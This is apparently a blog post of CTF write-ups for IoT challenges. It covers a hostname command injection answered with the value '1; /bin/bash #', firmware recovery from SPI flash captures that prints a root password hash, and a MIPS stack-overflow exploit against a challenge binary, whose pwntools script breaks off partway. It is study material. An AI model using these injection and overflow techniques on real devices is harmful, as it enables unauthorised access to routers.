<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>byuctf_iot | nyyyddddn</title>
  <meta name="author" content="nyyyddddn">
  
  <meta name="description" content="iotWe found a command injection….. but you have to reboot the router to activate it…
Reboot(Misc)### IMPORTS ###
import os, time, sys


### INPUT ###
hostname = &#39;bababooey&#39;

while True:
    print(&#39;=== MENU ===&#39;)
    print(&#39;1. Set hostname&#39;)
    print(&#39;2. Reboot&#39;)
    print()
    choice = input(&#39;Choice: &#39;)

    if choice == &#39;1&#39;:
        hostname = input(&#39;Enter new hostname (30 chars max): &#39;)[:30]

    elif choice == &#39;2&#39;:
        print(&#34;Rebooting...&#34;)
        sys.stdout.flush()
        time.sleep(30)
        os.system(f&#39;cat /etc/hosts | grep &amp;#123;hostname&amp;#125; -i&#39;)
        print(&#39;Reboot complete&#39;)

    else:
        print(&#39;Invalid choice&#39;)

命令注入？ 查询了一下shell相关的文档，发现可以通过 ;去连接两条子命令，# 去注释掉 -i
exp
1; &amp;#x2F;bin&amp;#x2F;bash #

Sal(HardWare)A few friends and I recently hacked into a consumer-grade home router. Our first goal was to obtain the firmware. To do that, we hooked up a SOIC-8 clip to the external flash memory chip, connected a Saleae Logic Pro 8 logic analyzer, and captured data using Logic 2 as we booted up the IoT device. The external flash memory chip was Winbond 25Q128JVSQ.

What&amp;#39;s the md5sum of &amp;#x2F;etc&amp;#x2F;passwd?

Flag format - byuctf&amp;#123;hash&amp;#125;

external flash memory chip(外部存储芯片) 一般用来存数据(文件系统)，需要分析Saleae逻辑分析仪捕获的信号，来还原这个文件系统"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="byuctf_iot"/>
  <meta property="og:site_name" content="nyyyddddn"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="nyyyddddn" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">nyyyddddn</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/catergories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> byuctf_iot</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h1 id="iot"><a href="#iot" class="headerlink" title="iot"></a>iot</h1><p>We found a command injection….. but you have to reboot the router to activate it…</p>
<h2 id="Reboot-Misc"><a href="#Reboot-Misc" class="headerlink" title="Reboot(Misc)"></a>Reboot(Misc)</h2><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">### IMPORTS ###</span>
<span class="token keyword">import</span> os<span class="token punctuation">,</span> time<span class="token punctuation">,</span> sys


<span class="token comment">### INPUT ###</span>
hostname <span class="token operator">=</span> <span class="token string">'bababooey'</span>

<span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'=== MENU ==='</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'1. Set hostname'</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'2. Reboot'</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    choice <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">'Choice: '</span><span class="token punctuation">)</span>

    <span class="token keyword">if</span> choice <span class="token operator">==</span> <span class="token string">'1'</span><span class="token punctuation">:</span>
        hostname <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">'Enter new hostname (30 chars max): '</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">30</span><span class="token punctuation">]</span>

    <span class="token keyword">elif</span> choice <span class="token operator">==</span> <span class="token string">'2'</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Rebooting..."</span><span class="token punctuation">)</span>
        sys<span class="token punctuation">.</span>stdout<span class="token punctuation">.</span>flush<span class="token punctuation">(</span><span class="token punctuation">)</span>
        time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">30</span><span class="token punctuation">)</span>
        os<span class="token punctuation">.</span>system<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'cat /etc/hosts | grep </span><span class="token interpolation"><span class="token punctuation">&#123;</span>hostname<span class="token punctuation">&#125;</span></span><span class="token string"> -i'</span></span><span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'Reboot complete'</span><span class="token punctuation">)</span>

    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'Invalid choice'</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>命令注入？ 查询了一下shell相关的文档，发现可以通过 ;去连接两条子命令，# 去注释掉 -i</p>
<p>exp</p>
<pre class="line-numbers language-none"><code class="language-none">1; &#x2F;bin&#x2F;bash #<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id="Sal-HardWare"><a href="#Sal-HardWare" class="headerlink" title="Sal(HardWare)"></a>Sal(HardWare)</h2><pre class="line-numbers language-none"><code class="language-none">A few friends and I recently hacked into a consumer-grade home router. Our first goal was to obtain the firmware. To do that, we hooked up a SOIC-8 clip to the external flash memory chip, connected a Saleae Logic Pro 8 logic analyzer, and captured data using Logic 2 as we booted up the IoT device. The external flash memory chip was Winbond 25Q128JVSQ.

What&#39;s the md5sum of &#x2F;etc&#x2F;passwd?

Flag format - byuctf&#123;hash&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>external flash memory chip(外部存储芯片) 一般用来存数据(文件系统)，需要分析Saleae逻辑分析仪捕获的信号，来还原这个文件系统</p>
<p>Saleae logic的官网有分析.sai文件的软件，需要下载这个软件来分析题目的附件</p>
<img src="/2024/09/07/byuctf-iot/1725646043363.png" class="" width="1725646043363">

<p>可以发现作者用Saleae logic录制了四个通道</p>
<img src="/2024/09/07/byuctf-iot/1725646209810.png" class="" width="1725646209810">

<p>通过阅读文档发现 Winbond 25Q128JVSQ使用的是spi通信协议</p>
<p>SPI 有四条信号线，这里主设备是指控制者，从设备是指flash存储芯片</p>
<pre class="line-numbers language-none"><code class="language-none">MOSI（Master Out Slave In）: 主设备输出数据，从设备接收数据。
MISO（Master In Slave Out）: 主设备接收数据，从设备输出数据。
SCLK（Serial Clock）: 时钟信号，由主设备生成，控制数据的传输速率。
SS&#x2F;CS（Slave Select&#x2F;Chip Select）: 从设备选择信号。当某个从设备被选中（SS为低电平时），它才会响应主设备的指令。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>Saleae logic里有一个spi数据分析的插件，可以把读写数据的行为分析出来</p>
<p>分析并且导出数据，得先区分这四个通道分别对应哪四个信号线，读取数据的时候，CS的电平会被拉低，然后通过DI依次输入0x3h以及一个24位的地址，地址被接收后，从设备准备好输出数据时，时钟信号会从高电平变成低电平触发数据输出</p>
<img src="/2024/09/07/byuctf-iot/1725646931685.png" class="" width="1725646931685">

<p>所以通道D1是CLK，D2是CS，D3是DI，D4是DO</p>
<img src="/2024/09/07/byuctf-iot/1725647455226.png" class="" width="1725647455226">

<p>设置好参数后就可以用spi内存分析的插件去分析数据了</p>
<img src="/2024/09/07/byuctf-iot/1725647736162.png" class="" width="1725647736162">

<p>Saleae输出进行parser的项目，可以分析I2C和SPI，并且可以把spi中的read sessions转换成原数据的项目<a target="_blank" rel="noopener" href="https://github.com/idaholab/Saleae_Output_Parser">https://github.com/idaholab/Saleae_Output_Parser</a></p>
<p>使用这个项目进行分析</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">python3 saleae_parser.py <span class="token parameter variable">-z</span> spi <span class="token parameter variable">--binary</span> <span class="token parameter variable">--device</span> W25Q128JVSQ data.csv<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>还原成功了，binwalk识别出文件系统了</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">lhj@lhj-virtual-machine:~/Desktop/byuctf/iot/Saleae_Output_Parser$ binwalk mem_map.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
<span class="token number">39192</span>         0x9918          CRC32 polynomial table, little endian
<span class="token number">40288</span>         0x9D60          <span class="token function">gzip</span> compressed data, maximum compression, from Unix, last modified: <span class="token number">2021</span>-04-28 08:49:30
<span class="token number">337944</span>        0x52818         LZMA compressed data, properties: 0x5D, dictionary size: <span class="token number">8388608</span> bytes, uncompressed size: <span class="token number">7676180</span> bytes
<span class="token number">2949120</span>       0x2D0000        Squashfs filesystem, little endian, version <span class="token number">4.0</span>, compression:xz, size: <span class="token number">3157356</span> bytes, <span class="token number">734</span> inodes, blocksize: <span class="token number">131072</span> bytes, created: <span class="token number">2038</span>-02-22 09:50:56
<span class="token number">14548992</span>      0xDE0000        JFFS2 filesystem, little endian
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>flag byuctf{c8ef3ad94c6eb97f4fa94a0f0ed33980}</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">lhj@lhj-virtual-machine:~/Desktop/byuctf/iot/Saleae_Output_Parser/_mem_map.bin.extracted/squashfs-root/etc$ <span class="token function">cat</span> <span class="token function">passwd</span>
root:<span class="token variable">$6</span><span class="token variable">$q6e6auXY</span><span class="token variable">$VErm6mljneXnoZfeEg9Z</span>.PDZMi29KP5UKB50DEleSr2DW1z4Bxt.07Y0KQKAzJwNFzas9snKlQXq2LC7gYzwW.:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null
lhj@lhj-virtual-machine:~/Desktop/byuctf/iot/Saleae_Output_Parser/_mem_map.bin.extracted/squashfs-root/etc$ md5sum <span class="token function">passwd</span>
c8ef3ad94c6eb97f4fa94a0f0ed33980  <span class="token function">passwd</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="Token-Pwn-Crypto"><a href="#Token-Pwn-Crypto" class="headerlink" title="Token(Pwn,Crypto)"></a>Token(Pwn,Crypto)</h2><pre class="line-numbers language-none"><code class="language-none">While doing hacking our router, we found a buffer overflow that had to be exploited in conditions similar to these ones. If you&#39;ve never learned MIPS, now is the time!<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这是一个mips32 小端序的程序，首先会生成一个十六字节的key，然后发送出来，然后读取数据到bss段上，判断数据前十六个字节是否符合格式，然后再用aes ecb的方式解密十六个字节后的数据最后parse</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> __cdecl <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>envp<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">unsigned</span> <span class="token keyword">int</span> v3<span class="token punctuation">;</span> <span class="token comment">// $v0</span>
  <span class="token keyword">unsigned</span> <span class="token keyword">int</span> v4<span class="token punctuation">;</span> <span class="token comment">// $v0</span>
  <span class="token keyword">int</span> i<span class="token punctuation">;</span> <span class="token comment">// [sp+18h] [+18h]</span>
  <span class="token keyword">unsigned</span> <span class="token keyword">int</span> j<span class="token punctuation">;</span> <span class="token comment">// [sp+1Ch] [+1Ch]</span>
  <span class="token class-name">ssize_t</span> v8<span class="token punctuation">;</span> <span class="token comment">// [sp+20h] [+20h]</span>
  <span class="token keyword">int</span> v9<span class="token punctuation">;</span> <span class="token comment">// [sp+24h] [+24h]</span>
  <span class="token keyword">char</span> key<span class="token punctuation">[</span><span class="token number">20</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [sp+28h] [+28h] BYREF</span>
  <span class="token keyword">char</span> cipher<span class="token punctuation">[</span><span class="token number">1032</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [sp+3Ch] [+3Ch] BYREF</span>
  <span class="token keyword">char</span> v12<span class="token punctuation">[</span><span class="token number">20</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [sp+444h] [+444h] BYREF</span>

  <span class="token function">strcpy</span><span class="token punctuation">(</span>key<span class="token punctuation">,</span> <span class="token string">"0123456789abcdef"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  v3 <span class="token operator">=</span> <span class="token function">time</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">srand</span><span class="token punctuation">(</span>v3<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;</span> <span class="token number">16</span><span class="token punctuation">;</span> <span class="token operator">++</span>i <span class="token punctuation">)</span>
  <span class="token punctuation">&#123;</span>
    v4 <span class="token operator">=</span> <span class="token function">rand</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0x800000FF</span><span class="token punctuation">;</span>
    key<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> v4<span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
  <span class="token function">write</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> key<span class="token punctuation">,</span> <span class="token number">0x10u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">memset</span><span class="token punctuation">(</span>input_buf<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">0x406u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  v8 <span class="token operator">=</span> <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> input_buf<span class="token punctuation">,</span> <span class="token number">0x400u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> v8 <span class="token operator">&lt;</span> <span class="token number">15</span> <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> input_buf<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token operator">!=</span> <span class="token char">'L'</span> <span class="token operator">||</span> byte_4140D1 <span class="token operator">!=</span> <span class="token char">'E'</span> <span class="token operator">||</span> byte_4140D7 <span class="token operator">!=</span> <span class="token char">'G'</span> <span class="token operator">||</span> byte_4140D8 <span class="token operator">!=</span> <span class="token char">'O'</span> <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token punctuation">(</span>_BYTE<span class="token punctuation">)</span>v8 <span class="token operator">-</span> <span class="token number">15</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0xF</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">0</span> <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span>
  v9 <span class="token operator">=</span> <span class="token punctuation">(</span>v8 <span class="token operator">-</span> <span class="token number">15</span><span class="token punctuation">)</span> <span class="token operator">/</span> <span class="token number">16</span><span class="token punctuation">;</span>
  <span class="token function">memset</span><span class="token punctuation">(</span>cipher<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">0x406u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span> j <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> j <span class="token operator">&lt;</span> v8 <span class="token operator">-</span> <span class="token number">15</span><span class="token punctuation">;</span> <span class="token operator">++</span>j <span class="token punctuation">)</span>
    cipher<span class="token punctuation">[</span>j<span class="token punctuation">]</span> <span class="token operator">=</span> input_buf<span class="token punctuation">[</span>j <span class="token operator">+</span> <span class="token number">15</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token function">decrypt_aes_ecb</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span>key<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span>cipher<span class="token punctuation">,</span> v9<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">memset</span><span class="token punctuation">(</span>v12<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>v12<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">parse</span><span class="token punctuation">(</span>cipher<span class="token punctuation">,</span> v12<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span>v12<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

bool __fastcall <span class="token function">decrypt_aes_ecb</span><span class="token punctuation">(</span><span class="token keyword">int</span> a1<span class="token punctuation">,</span> <span class="token keyword">int</span> a2<span class="token punctuation">,</span> <span class="token keyword">int</span> a3<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  _BOOL4 result<span class="token punctuation">;</span> <span class="token comment">// $v0</span>
  <span class="token keyword">int</span> i<span class="token punctuation">;</span> <span class="token comment">// [sp+18h] [+18h]</span>
  <span class="token keyword">char</span> v5<span class="token punctuation">[</span><span class="token number">180</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [sp+1Ch] [+1Ch] BYREF</span>

  <span class="token keyword">for</span> <span class="token punctuation">(</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token punctuation">;</span> <span class="token operator">++</span>i <span class="token punctuation">)</span>
  <span class="token punctuation">&#123;</span>
    result <span class="token operator">=</span> i <span class="token operator">&lt;</span> a3<span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span> i <span class="token operator">>=</span> a3 <span class="token punctuation">)</span>
      <span class="token keyword">break</span><span class="token punctuation">;</span>
    <span class="token function">AES_init_ctx</span><span class="token punctuation">(</span>v5<span class="token punctuation">,</span> a1<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">AES_ECB_decrypt</span><span class="token punctuation">(</span>v5<span class="token punctuation">,</span> a2 <span class="token operator">+</span> <span class="token number">16</span> <span class="token operator">*</span> i<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
  <span class="token keyword">return</span> result<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">void</span> <span class="token operator">*</span>__fastcall <span class="token function">parse</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span>a1<span class="token punctuation">,</span> <span class="token keyword">void</span> <span class="token operator">*</span>a2<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>i<span class="token punctuation">;</span> <span class="token comment">// [sp+18h] [+18h]</span>
  <span class="token keyword">char</span> v4<span class="token punctuation">;</span> <span class="token comment">// [sp+1Ch] [+1Ch] BYREF</span>
  <span class="token keyword">char</span> v5<span class="token punctuation">;</span> <span class="token comment">// [sp+2Ch] [+2Ch] BYREF</span>

  <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span>a1 <span class="token punctuation">)</span>
    <span class="token keyword">return</span> <span class="token function">memcpy</span><span class="token punctuation">(</span>a2<span class="token punctuation">,</span> <span class="token string">"&#123;\"code\":-2&#125;"</span><span class="token punctuation">,</span> <span class="token number">0xBu</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span> i <span class="token operator">=</span> <span class="token function">strtok</span><span class="token punctuation">(</span>a1<span class="token punctuation">,</span> <span class="token string">"&amp;"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> i<span class="token punctuation">;</span> i <span class="token operator">=</span> <span class="token function">strtok</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token string">"&amp;"</span><span class="token punctuation">)</span> <span class="token punctuation">)</span>
  <span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span><span class="token function">strncmp</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"t="</span><span class="token punctuation">,</span> <span class="token number">2u</span><span class="token punctuation">)</span> <span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
      <span class="token function">sscanf</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"t=%s"</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>v4<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">else</span>
    <span class="token punctuation">&#123;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">strncmp</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"tz="</span><span class="token punctuation">,</span> <span class="token number">3u</span><span class="token punctuation">)</span> <span class="token punctuation">)</span>
        <span class="token keyword">return</span> <span class="token function">memcpy</span><span class="token punctuation">(</span>a2<span class="token punctuation">,</span> <span class="token string">"&#123;\"code\":-1&#125;"</span><span class="token punctuation">,</span> <span class="token number">0xBu</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token function">sscanf</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"tz=%d"</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>v5<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
  <span class="token punctuation">&#125;</span>
  <span class="token keyword">return</span> <span class="token function">memcpy</span><span class="token punctuation">(</span>a2<span class="token punctuation">,</span> <span class="token string">"&#123;\"code\":0&#125;"</span><span class="token punctuation">,</span> <span class="token number">0xBu</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在parser函数中 解析t&#x3D;字段的时候value的位置有一个栈溢出，mips在叶子函数调用栈回溯的方式是jmp ra,非叶子函数的回溯方式是把返回地址复制到ra寄存器中再jmp ra，所以劫持控制流jmp到任意地址一次非常简单，但是后续的操作就很麻烦，不能像x86 64中rop的方式，找ret结尾的gadget打rop</p>
<p>程序中有一个输出日志的logging函数有system的引用</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">logging</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">char</span> v1<span class="token punctuation">[</span><span class="token number">516</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [sp+18h] [+18h] BYREF</span>
  <span class="token keyword">char</span> v2<span class="token punctuation">[</span><span class="token number">36</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [sp+21Ch] [+21Ch] BYREF</span>

  <span class="token function">memset</span><span class="token punctuation">(</span>v1<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>v1<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">strcpy</span><span class="token punctuation">(</span>v2<span class="token punctuation">,</span> <span class="token string">"Imagine this is a log message"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">snprintf</span><span class="token punctuation">(</span>v1<span class="token punctuation">,</span> <span class="token number">0x200u</span><span class="token punctuation">,</span> <span class="token string">"echo '%s'"</span><span class="token punctuation">,</span> v2<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">system</span><span class="token punctuation">(</span>v1<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>其中有一个片段是，由于第一次输入的地址是在bss段上的，只需要构造payload的时候加上binsh，覆盖fp为bss就能取到binsh的地址</p>
<pre class="line-numbers language-assembly" data-language="assembly"><code class="language-assembly"># .text:0040104C 18 00 C2 27                   addiu   $v0, $fp, 0x240+var_228
# .text:00401050 25 20 40 00                   move    $a0, $v0                         # command
# .text:00401054 7C 80 82 8F                   la      $v0, system
# .text:00401058 25 C8 40 00                   move    $t9, $v0
# .text:0040105C 09 F8 20 03                   jalr    $t9 ; system<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>sscanf %s导致的溢出有00截断的原因，但是parser函数的实现，可以通过构造多个”t&#x3D;”的表达式去实现多次栈溢出，首先先把返回地址的低三个字节覆盖，然后再把fp覆盖成bss就好了</p>
<p>exp</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Cipher <span class="token keyword">import</span> AES
<span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Util<span class="token punctuation">.</span>Padding <span class="token keyword">import</span> pad


context<span class="token punctuation">.</span>log_level <span class="token operator">=</span> <span class="token string">'debug'</span>

binary <span class="token operator">=</span> <span class="token string">"./token"</span>
elf <span class="token operator">=</span> context<span class="token punctuation">.</span>binary <span class="token operator">=</span> ELF<span class="token punctuation">(</span>binary<span class="token punctuation">,</span> checksec<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>
qemu <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'/usr/bin/qemu-mipsel'</span><span class="token punctuation">,</span>checksec<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>

is_debug <span class="token operator">=</span> <span class="token number">1</span>

<span class="token keyword">if</span> is_debug<span class="token punctuation">:</span>
